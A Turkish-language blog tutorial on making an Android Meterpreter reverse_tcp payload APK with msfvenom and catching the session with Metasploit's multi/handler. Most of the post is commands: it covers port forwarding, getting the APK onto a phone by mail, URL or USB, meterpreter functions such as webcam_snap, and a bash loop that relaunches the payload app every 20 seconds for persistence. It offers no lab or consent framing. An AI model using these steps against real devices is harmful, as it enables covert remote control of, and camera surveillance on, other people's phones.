Metasploit ile Android payload kullanımı

Bekir Kökkuş
3 min readAug 3, 2016

Bu yazıya çok detaylı değinmeyeceğim çünkü bir çok kaynak bulabileceğiniz bir konu. Bu yüzden hızlı bir şekilde anlatıp bazı noktalara (notlara)değinmek istiyorum.

Öncelikle msfvenom kullanarak kendimize bir payload .apk oluşturuyoruz.

> msfvenom –p android/meterpreter/reverse_tcp set LHOST=192.168.1.20 R > /root/Desktop/and.apk

Masaüstümüze payload oluşturduk.

NOT 1: Eğer uzaktan bağlantı alacaksanız (aynı ağda değilseniz) LHOST kısmına dış ip adresinizi (internete çıkış yaptığınız ip adresinizi) yazacaksınız.

NOT 2: İç veya dış bağlantıda alsanız. Yerel ip (local ip) adresinize modem ara yüzünüzden port yönlendirmesi sağlamanız gerekmektedir.

NOT 3: Uzaktan yönetimde bağlanmanız yerel ağdan uzun sürebilir.

NOT 4: Modemde port yönlendirilir (AÇILMAZ). Modeminizden yönlendirdiğiniz portu kontrol etmek isteğinizde port kapalı yazacak. Çünkü yönlendirdiğiniz port yönlendirdiğiniz ip adresinde açık (LISTEN) durumda değil. Kontrol etmek için bir örnek vermek gerekirse ;

> nc –lvp 4444

Terminale yazarak netcat ile 4444 portunu açık (LISTEN) durumuna getirerek kontrol edebilirsiniz.

Bu işlemlerimizi tamamladıktan sonra oluşturduğumuz and.apk dosyamızı mail , url veya usb kablo aracılığı ile telefonumuza indiriyoruz/aktarıyoruz ve yüklüyoruz.

Şimdi uygulamayı açmadan exploit/multi/handler açarak dinlemeye geçelim.

Terminale ;

>service postgresql start

yazarak postgresql servisimizi başlattık

> service postgresql status

yazarak servisimiz aktif halde mi kontrol ediyoruz.

>msfconsole

msf> use exploit/multi/handler

msf> set payload android/meterpreter/reverse_tcp

msf> set LHOST 192.168.1.20 (bu kısma dış bağlantı sağlayacakda olsanız. Yerel ip adresinizi yazacaksanız. Çünkü modeminizden gelen bağlantıyı yerelde yakalayacağınız yer burasıdır.)

msf> exploit

exploit dedik ve dinlemeye başladık.

Şimdi telefonumuza yüklediğimiz uygulamamızı açıyoruz. Bağlantıyı yakalıyoruz ve meterpreter çalışıyor.

Daha sonra ;

meterpreter>help

“help” komutunu yazarak bize sağladı fonksiyonlardan yaralanabiliriz.

Ayrıca yine bir fonksiyonu –h parametresi ile beraber kullanarak o fonksiyonun kullanımı konusunda bilgi sahibi olabiliriz. Örnek;

meterpreter> webcam_snap –h

NOT 5: Uygulama kapansa bile uygulamanın kendiliğinden yeniden başlamasını istiyorsanız.

— — — — — — — — — —

#!/bin/bash

while true

do am start — user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20

done

— — — — — — — — — —

Yukarıdaki kod bloğunu bir not defterine yapıştırın ve *.sh uzantısıyla (ornek.sh) olarak kaydedin. Dosyayı meterpreter yardımıyla upload edin. Daha sonra Shell komutunu girin.

meterpreter> shell

Dosyanın bulunduğu dizine gidin ve dosyanızı çalıştırın.

> sh ornek.sh

Çalıştığından emin olduğunuzda CTRL + C ile çıkış yaparak meterpreter ‘a geri dönün. Telefonda açık olan uygulamayı kapatın. Meterpreter duracak ve oturumun öldüğünü söyleyecek. Bir kez enter tuşuna bastığınızda aktif exploit komut satırı gelecek. 20 saniye sonra exploit dediğinizde uygulama arka plan da tekrar çalışmaya başlayacak ve bağlantı sağlayacaksınız.

iyi çalışmalar ..

--

--